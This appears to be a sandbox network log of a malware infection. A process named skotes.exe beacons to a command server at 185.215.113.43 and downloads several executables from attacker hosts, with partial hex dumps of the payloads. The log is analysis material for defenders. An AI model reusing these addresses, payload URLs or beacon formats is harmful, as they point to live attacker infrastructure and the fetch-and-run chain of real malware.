Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:07.081268072 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 30 42 34 35 38 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22970B45882D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 13, 2024 20:41:08.011814117 CET	636	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 62 64 0d 0a 20 3c 63 3e 31 30 30 36 30 33 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 34 30 64 35 64 61 61 63 62 34 65 37 65 33 64 34 31 37 62 62 33 30 31 61 65 38 63 39 65 61 65 65 36 66 35 66 62 63 36 37 34 64 63 34 34 35 34 62 62 23 31 30 30 36 30 33 39 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 36 30 34 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 36 30 34 31 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 [TRUNCATED] Data Ascii: 1bd <c>1006034001+++b5937c1a99d5f9d40d5daacb4e7e3d417bb301ae8c9eaee6f5fbc674dc4454bb#1006039001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1006040001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1006041031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1006042001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	50140	87.120.125.254	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:08.021161079 CET	50	OUT	GET /img/mk.exe HTTP/1.1 Host: 87.120.125.254
Nov 13, 2024 20:41:08.868988037 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:41:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 13 Nov 2024 19:06:18 GMT ETag: "8e0a00-626d007592bf0" Accept-Ranges: bytes Content-Length: 9308672 Content-Type: application/x-msdownload Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 ff f6 34 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 b4 44 00 00 52 49 00 00 00 00 00 d0 c1 44 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 20 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win64$7PEd4g"DRID@ @ LKIS;O0LY L(K(K<.text`DD `.dataDD@.bssJ.idataIKJJ@.didata<KK@.edataL(K@@.tlspL.rdatam L*K@@.relocY0LZ,K@B.pdataON@@.rsrc;S;~R@@
Nov 13, 2024 20:41:08.869052887 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 20 8f 00 00 00 00 00 00 0a 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 10 40 00 00 00 00 00 03 07 42 6f 6f 6c 65 61 6e 01 00 Data Ascii: @@@Boolean@FalseTrueSystem@@AnsiChar`@Char@ShortInt@SmallInt
Nov 13, 2024 20:41:08.869090080 CET	1236	IN	Data Raw: 00 08 00 00 00 00 00 00 00 02 02 44 34 02 00 02 00 05 00 0b 30 4d 41 00 00 00 00 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 00 00 00 00 02 12 30 14 40 00 00 00 00 00 04 4c 65 66 74 02 00 12 30 14 40 00 00 00 00 00 05 52 69 67 68 Data Ascii: D40MA&op_Equality@0@Left0@RightPMA&op_Inequality@0@Left0@Right`NAEmpty0@pMACreate0@Data@BigEn
Nov 13, 2024 20:41:08.869127035 CET	1236	IN	Data Raw: 67 68 74 02 00 02 00 38 1a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 25 40 00 00 00 00 00 00 00 00 00 00 00 00 00 38 1a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 1b 40 00 00 00 00 00 10 00 00 Data Ascii: ght8@%@8@@@@@@@@ @@@@@@@ @%@D4@Bd@
Nov 13, 2024 20:41:08.869163036 CET	848	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 38 00 50 b3 40 00 00 00 00 00 0c 49 6e 73 74 61 6e 63 65 53 69 7a 65 03 00 b8 10 40 00 00 00 00 00 18 00 01 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 4c 00 90 ba 40 00 00 Data Ascii: Self8P@InstanceSize@SelfL@InheritsFrom@ Self@AClassK0@MethodAddress8@ Selfp@NameK@Method
Nov 13, 2024 20:41:08.869195938 CET	1236	IN	Data Raw: b7 40 00 00 00 00 00 08 55 6e 69 74 4e 61 6d 65 03 00 70 13 40 00 00 00 00 00 20 00 02 00 00 00 00 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 40 70 13 40 00 00 00 00 00 00 00 01 01 02 00 02 00 44 00 30 b8 40 00 00 00 00 00 09 55 6e 69 74 53 63 6f Data Ascii: @UnitNamep@ Self@p@D0@UnitScopep@ Self@p@C@Equals@ %@Self%@Obj7@GetHashCode@%@
Nov 13, 2024 20:41:08.869231939 CET	1236	IN	Data Raw: b1 40 00 00 00 00 00 e0 b1 40 00 00 00 00 00 f0 b3 40 00 00 00 00 00 00 b2 40 00 00 00 00 00 10 b2 40 00 00 00 00 00 20 b2 40 00 00 00 00 00 00 00 00 00 00 00 10 54 43 75 73 74 6f 6d 41 74 74 72 69 62 75 74 65 00 b0 26 40 00 00 00 00 00 07 10 54 Data Ascii: @@@@@ @TCustomAttribute&@TCustomAttribute&@%@System'@'@'@'@%@@@@
Nov 13, 2024 20:41:08.869266987 CET	1236	IN	Data Raw: 6f 72 61 67 65 48 61 6e 64 6c 65 72 4e 61 6d 65 02 00 02 00 00 00 00 00 00 00 00 58 2b 40 00 00 00 00 00 07 0f 53 74 6f 72 65 64 41 74 74 72 69 62 75 74 65 e8 29 40 00 00 00 00 00 a8 26 40 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 00 00 02 00 02 Data Ascii: orageHandlerNameX+@StoredAttribute)@&@System+@+@@Flagp@Name,@-@
Nov 13, 2024 20:41:08.869303942 CET	636	IN	Data Raw: 03 00 43 30 40 00 00 00 00 00 4a 00 f6 ff 80 30 40 00 00 00 00 00 4a 00 f7 ff bd 30 40 00 00 00 00 00 4b 00 fa ff 00 00 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 3d 00 a0 44 41 00 00 00 00 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 Data Ascii: C0@J0@J0@KTInterfacedObject=DAAfterConstruction0@Self=DABeforeDestruction0@Self7DANewInstance%@Self1@
Nov 13, 2024 20:41:08.869343042 CET	1236	IN	Data Raw: 74 65 67 65 72 b8 10 40 00 00 00 00 00 02 00 00 00 00 00 a0 32 40 00 00 00 00 00 14 05 50 42 79 74 65 d8 10 40 00 00 00 00 00 02 00 00 00 00 00 00 00 00 c0 32 40 00 00 00 00 00 14 06 50 49 6e 74 36 34 58 11 40 00 00 00 00 00 02 00 00 00 00 00 00 Data Ascii: teger@2@PByte@2@PInt64X@2@PExtended@3@PCurrencyX@ 3@PVariant@@3@TDateTimeX3@TDatep3@TTime
Nov 13, 2024 20:41:08.874619961 CET	1236	IN	Data Raw: 65 02 00 f8 10 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 05 56 57 6f 72 64 02 00 18 11 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 58 11 40 00 00 00 00 00 08 00 00 00 00 00 00 00 02 06 56 49 6e 74 36 34 02 Data Ascii: e@VWord@VLongWordX@VInt64@VUInt648@VString8@VAny 4@VArray8@VPointer8@VUString

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	50141	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:15.902689934 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 30 33 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006034001&unit=246122658369
Nov 13, 2024 20:41:16.819478989 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	50142	185.215.113.16	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:16.827979088 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 13, 2024 20:41:17.729187965 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:17 GMT Content-Type: application/octet-stream Content-Length: 3180032 Last-Modified: Wed, 13 Nov 2024 19:21:24 GMT Connection: keep-alive ETag: "6734fc34-308600" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 ac 34 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ce 03 00 00 c0 00 00 00 00 00 00 00 90 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 30 00 00 04 00 00 04 60 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 40 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4g0@0`1@T@hA @.rsrc 00@.idata @0@vdmmmaet0+P.+2@wxqjpqnl0`0@.taggant00"d0@
Nov 13, 2024 20:41:17.729214907 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:17.729233980 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:17.729253054 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:17.729274988 CET	448	IN	Data Raw: a8 03 8a c9 5d 6b f2 c3 6c 03 0c 6f 7a 03 74 4c ed 07 f7 8c b8 80 02 c9 a8 03 f1 89 ad 8c 4e 33 99 f6 87 c9 98 3f 74 4c ed ff f6 8c b8 7f 9a c9 a8 03 35 cd a8 03 74 cd ef 43 78 ce a8 03 74 b6 6b 04 74 cd 92 13 1d da ac 13 b8 cd 2b bf 78 4a e9 06 Data Ascii: ]kloztLN3?tL5tCxtkt+xJtttxl4,sLis5ttCtit5ttCTtVn4%AzmJXt1GX+\|x\|c2W2wXmN>Xt>tt+x.,
Nov 13, 2024 20:41:17.729294062 CET	1236	IN	Data Raw: a8 03 eb f4 ef 43 78 cd a8 03 74 88 69 07 74 cd a8 03 35 0d b1 03 74 cd a8 8c b7 d5 31 ec e9 ee 28 78 74 24 b8 80 05 ce a8 03 eb 10 cd 13 f1 45 ad 00 a8 cb b9 c3 eb c8 cc 3e b7 56 d7 06 e6 21 a9 52 0c 07 79 03 74 4c ed ff b6 4a e9 70 10 4d 04 58 Data Ascii: Cxtit5t1(xt$E>V!RytLJpMXmJt1% VtL+xJ=tt15tCxtVqtntt1 ft+xBtT]5049BI8k4:9mJntk~
Nov 13, 2024 20:41:17.729312897 CET	112	IN	Data Raw: f9 55 bd 24 ec c7 30 91 f5 8a b0 e9 ac 34 34 4a f2 6f 6b 4c 82 ff 71 3a ac 8a b3 d5 eb c7 30 91 f5 c7 30 91 f5 c7 30 91 f5 4e c6 54 7d 1f 70 a6 17 80 26 39 bc 8a a0 e9 98 80 1d 39 d4 d8 3c 18 11 bf 8a cd a8 82 38 c9 58 4e c6 b5 82 f5 1d c0 2c bf Data Ascii: U$044JokLq:000NT}p&99<8XN,pJomLppk;gV10
Nov 13, 2024 20:41:17.729331017 CET	1236	IN	Data Raw: f5 c7 30 91 f5 c7 30 91 f5 8a b0 e9 ac 34 34 4a f2 6f 6b 4c 82 ff 77 3a ac 8a b3 d5 eb c7 30 91 f5 c7 30 91 f5 c7 30 91 f5 52 c5 17 34 77 58 dd b9 ed f7 bf 7d 2c e9 20 cd 0f f7 a3 7d 24 c1 b5 5e 69 74 cd 2b bf 78 1d 5c 4e 0c d3 06 f6 1d 4c ed 07 Data Ascii: 0044JokLw:000R4wX}, }$^it+x\NL}D3slVU$044JokLv:000R4wXF999RtL`49pqTygVR4WX3wX%it+lJoZV]!%it
Nov 13, 2024 20:41:17.729348898 CET	1236	IN	Data Raw: 33 44 78 56 6d 1f 6c 52 c5 32 b5 b4 99 93 04 5d 19 93 04 5d 19 3e af d0 2c 40 1d c0 08 8c 1e ec 7c 1f 70 54 6d 1f 6c 54 ad b3 f1 c4 08 06 f8 f8 07 f6 1d 54 5a 0b 5b e1 2a 70 3a 54 72 07 e9 f8 29 4d 0c 3f 8e 03 74 54 75 1f 4c 4c ed ff 58 c9 cc 70 Data Ascii: 3DxVmlR2...,@\|pTmlTTZ[p:Tr)M?tTuLLXp2}d.`t3GX+pJpg1,FV}pTZ>]...,\|pTmlTTZ[p:Tr)StTuLLXp993
Nov 13, 2024 20:41:17.729372978 CET	424	IN	Data Raw: cd 0f 0c 83 aa 03 74 4a e9 06 f7 57 aa 03 74 54 75 1f 88 4c 02 76 a5 ea 30 05 dc cd a8 03 74 ce eb 82 31 cc 33 0f 58 b4 4d bd 76 21 14 96 36 c7 b5 ea fa 86 af 07 09 5a ef fd 6a b4 19 84 1b c0 b0 03 74 54 9d 1f a5 da 31 cb 33 b5 af 07 34 55 af 83 Data Ascii: tJWtTuLv0t13XMv!6ZjtT134U)Tw1pU,W)Twss,q*mHt(xv!(ApmJt+lVulV!00tt~
Nov 13, 2024 20:41:17.734705925 CET	1236	IN	Data Raw: cc 51 1d da a8 13 b8 cd 2b bf 78 fe e8 82 38 e5 66 56 b9 22 ec c7 30 91 f5 50 c1 18 5f 53 6d 7f a2 b6 1d c0 08 f6 f7 a3 b8 7f 7f ce a8 03 eb d8 cc 06 de 1d aa 80 42 d0 2c 05 73 cd a8 06 de 0d ab 80 34 d0 2c 01 73 cd a8 06 de 35 ac 80 0f d0 2c ed Data Ascii: Q+x8fV"0P_SmB,s4,s5,t;MnwL1(RV3)v;++V3)k82")L+CMqu3MnwL1(RV3)v;++VV3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	50144	185.215.113.43	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:21.754611969 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 36 30 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1006039001&unit=246122658369
Nov 13, 2024 20:41:22.666295052 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50145	185.215.113.16	80	2848	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:22.684174061 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 13, 2024 20:41:23.615107059 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 13 Nov 2024 19:41:23 GMT Content-Type: application/octet-stream Content-Length: 1799168 Last-Modified: Wed, 13 Nov 2024 19:21:30 GMT Connection: keep-alive ETag: "6734fc3a-1b7400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 c0 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 68 00 00 04 00 00 e7 f6 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8kkk'kkkk&kkkkkkjkkk#kkkkRichkPELO/g@"h@h@M$a$ $b@.rsrc $r@.idata $r@ *$t@dhewrjwpNv@uaqjjwiohL@.taggant0h"R@
Nov 13, 2024 20:41:23.615148067 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:23.615181923 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:23.615360975 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 13, 2024 20:41:23.615412951 CET	1236	IN	Data Raw: 8a 66 b5 f5 3f 6b e8 76 77 17 3d 72 00 ee c7 8c 8a f5 3e 1a bc 50 81 d8 9f ef 63 19 d8 66 d1 a0 af 46 02 79 f9 4b 0c 18 39 e5 e3 e3 88 f2 29 01 58 7c 21 89 9f f3 85 c0 96 c6 3f 1d e9 f6 15 c8 17 19 9e b9 0f 3d 79 1e 42 63 24 1a 1e fc 31 22 34 be Data Ascii: f?kvw=r>PcfFyK9)X\|!?=yBc$1"4>$2myT$+)(~.s^9Nq~#!jMKvi()[2QA{Co-);Bw~!l.G+oof
Nov 13, 2024 20:41:23.615447044 CET	1236	IN	Data Raw: 89 67 2a d8 3e ee df bf c1 43 94 f3 cc cb 0c 10 8d c0 7d 88 7e 4e 60 55 bf 31 92 10 56 bf f9 21 2e c1 f7 74 39 22 2f 9f ca 90 3f 1d d7 e0 4b 20 dd 0b f9 71 fe d0 f9 39 fb 63 e8 8f 19 88 13 48 cc 5d 7f c3 a3 67 1b e1 d6 42 b8 3e 9e 62 91 e9 de a9 Data Ascii: g*>C}~N`U1V!.t9"/?K q9cH]gB>b}c[)26=%'!Dj 2+b_gn,0OQEN~XWCQ!!)70)^r[pwB?<Ju]SS"e8@wg )
Nov 13, 2024 20:41:23.615479946 CET	1236	IN	Data Raw: 9f b6 df bb e6 a6 9a e5 d9 d6 f7 21 bc a6 fc f9 6b 02 8e a1 df a0 c9 1f bc be f1 bd 1b ee b1 e5 a3 29 e9 a4 cf b9 cf f8 db 2c f9 13 95 86 f7 c1 af c2 0d 08 bc af aa ea 8d 83 12 7a 1b c0 61 09 c8 af b0 e8 1c 86 fe c1 f7 c2 41 08 30 02 e1 58 da e8 Data Ascii: !k),zaA0X/Eruvqt)wugy&2b"<w"#yf,z?B+!WM!6'{7GM"XvwnaH:"r
Nov 13, 2024 20:41:23.615514040 CET	1236	IN	Data Raw: 9a d9 a8 f5 22 0d b1 06 8a d2 0f f4 9b 2c ee 3e 7b 40 b2 ba 25 b4 ba a6 17 29 32 55 db 99 0e c4 9f b4 66 e5 ab 86 22 8b de 83 24 52 9f b4 b2 e6 4b a0 71 02 1d c2 fa a5 c8 86 e1 41 d9 1a 71 06 a8 f4 37 d2 2f b4 f2 f9 7a 06 c6 7d 07 f8 7d 30 86 a6 Data Ascii: ",>{@%)2Uf"$RKqAq7/z}}0t%: onU GrZFOoVE86}?+mpuxzBrwMv 6+@:
Nov 13, 2024 20:41:23.615547895 CET	1236	IN	Data Raw: b7 21 e4 55 79 6a f8 77 8b a0 73 bd 1f 5b e0 f9 57 02 52 7d df 17 76 c0 83 4a dd a0 d7 22 f7 23 94 0f 93 f9 c1 a3 6a b2 8d c1 61 08 20 c0 34 d6 a5 18 f2 f3 47 ed 11 a0 07 d5 63 20 4b 5e e3 f9 2b 08 d2 98 8a 9f b1 a6 9f d3 3b f2 e6 a6 52 e8 83 a9 Data Ascii: !Uyjws[WR}vJ"#ja 4Gc K^+;R')j\|Z!D{NV_v8Cr0!jV,[2z}6{]6ZEQI
Nov 13, 2024 20:41:23.615582943 CET	1236	IN	Data Raw: 8b 40 ec 27 8a b2 cd 05 f0 a0 ca f7 b7 19 d6 e4 1e d2 cf f3 c3 af d0 f5 1d f0 fc 77 9f ee c5 0e e0 06 92 f6 e1 81 18 e4 cb 02 fe c5 da 21 da 24 85 79 8f 7f 8b 12 69 f4 17 86 72 e6 21 63 0d fa 9c e6 75 a2 0b c0 a1 a2 7b 6d ef f5 1f 60 e3 f9 eb 02 Data Ascii: @'w!$yir!cu{m`W52c=2Gy5tyV$V1!BqY0-"1RJy82vr!)v)fjt3?J1I!<tz
Nov 13, 2024 20:41:23.620554924 CET	1120	IN	Data Raw: 63 ff 62 56 21 ae 3d aa 2c b7 a2 0f 58 ee ec 6c 81 0e 1a 25 7c 7f ca 42 e5 1f 3a 14 73 6f 7e d5 77 59 57 04 b8 14 ce 03 f5 37 10 23 23 13 a2 d8 d2 92 c9 19 76 80 59 89 95 91 34 4e 77 b1 de ee ab 27 77 7d dd 76 ca 13 9e 4a e5 2c 93 f6 71 6b 23 22 Data Ascii: cbV!=,Xl%\|B:so~wYW7##vY4Nw'w}vJ,qk#"pJ+rVuRy*~{c3u@L4FOl.\|Ep5 RxNum><}E2"[{rC:cJU6.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50149	185.215.113.206	80	2140	C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe

Timestamp	Bytes transferred	Direction	Data
Nov 13, 2024 20:41:26.789021015 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Nov 13, 2024 20:41:27.729768038 CET	203	IN	HTTP/1.1 200 OK Date: Wed, 13 Nov 2024 19:41:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
